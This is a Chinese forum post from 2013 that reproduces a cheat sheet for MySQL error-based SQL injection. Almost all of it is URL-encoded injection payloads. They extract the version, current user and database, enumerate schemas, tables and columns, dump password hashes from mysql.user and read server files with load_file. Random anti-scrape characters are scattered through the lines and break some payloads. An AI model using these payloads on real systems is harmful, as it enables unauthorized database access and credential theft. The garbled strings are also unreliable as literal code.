Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑


# Z8 U9 Z. m( L" z0 T: Z6 j* ]; zMysql暴错注入参考（pdf），每天一贴。。。
( K4 U8 Q7 R; j/ [
0 ~/ u$ G5 [/ F! z5 RMySql Error Based Injection Reference
: w" [1 z1 {: G* L+ s* M. c/ e[Mysql暴错注入参考]
8 a% U- d$ Z; a, @1 g8 q0 C% rAuthornig0s1992
8 I- n% u# y6 FBlog:http://pnig0s1992.blog.51cto.com/
+ d! `( O8 l; |3 `( ~  XTeAm:http://www.FreeBuf.com/
( D2 r# y2 J) lMysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
* c8 H: ]9 S8 u3 p0 `小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
8 b$ U5 `* u7 c6 h( G  g7 RMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)
! W4 Y/ a- h5 k& a, sMethod.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
查询当前用户:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
and(0)*2))x+from+information_schema.tables+group+by+x)a)
查询当前数据库:
3 O* W! k1 u6 ?$ L! |2 A( lMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
7 E2 t4 d  l8 W; ]: lMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
0 A2 S2 H- j! V: g4 o( s: R依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
7 r+ m$ j2 [- a$ ]% N" ULIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
! d+ U! j) b; F顺序替换
爆指定库数目:
* w: h. o- }+ \. O1 X' b# Uand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
- [+ g  i1 ^' Q. ?6 D- m. _able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
' @  \* b% Q) D2 {' T9 _9 p+by+x)a)+and+1=1 0x6D7973716C=mysql
, }3 y, `7 k. _3 H" H/ Y: W, i* J依次爆表:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
, a1 Z4 V5 r8 `$ r8 @0x6D7973716C=Mysql 将n顺序替换
* z& W6 O  o7 _" S爆表内字段数目:
+ C; {' ]4 q  U, {9 i% A2 hand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
* ~, g8 b& @- g" i' {, J0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
  f6 p. i7 P" Q1 U" `: p# @依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+ o2 }% i4 _! j+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
3 L* {3 q+ r) C/ h5 H& U% g8 t4 eloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
. y' @7 t1 M* ]8 z" E依次暴内容:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
: e4 D# U* l3 {' A6 s( m5 S将n顺序替换
爆文件内容:
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
# I+ v' _5 o8 E2 s% Vfrom+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
( V, R- H* c: s2 F- VThx for reading.

不要下载也可以，
$ o" c. @  \8 z% p, X